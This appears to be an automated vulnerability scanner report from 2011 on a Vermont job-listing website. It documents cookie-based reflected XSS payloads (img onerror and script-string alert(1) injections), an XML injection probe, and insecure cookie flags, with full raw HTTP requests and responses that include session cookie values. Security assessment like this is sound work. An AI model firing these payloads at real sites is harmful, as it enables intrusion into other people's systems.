The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 53fa7"><img src=a onerror=alert(1)>6f76395c81f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en53fa7"><img%20src%3da%20onerror%3dalert(1)>6f76395c81f; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:25 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en53fa7"><img src=a onerror=alert(1)>6f76395c81f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6ff"%3balert(1)//cac32dd0109 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 8c6ff";alert(1)//cac32dd0109 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en8c6ff"%3balert(1)//cac32dd0109; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:27 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN8C6FF";ALERT(1)//CAC32DD0109\"> ...[SNIP]...
The usvuserid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the usvuserid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:26:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
3. SSL cookie without secure flag setpreviousnext There are 29 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 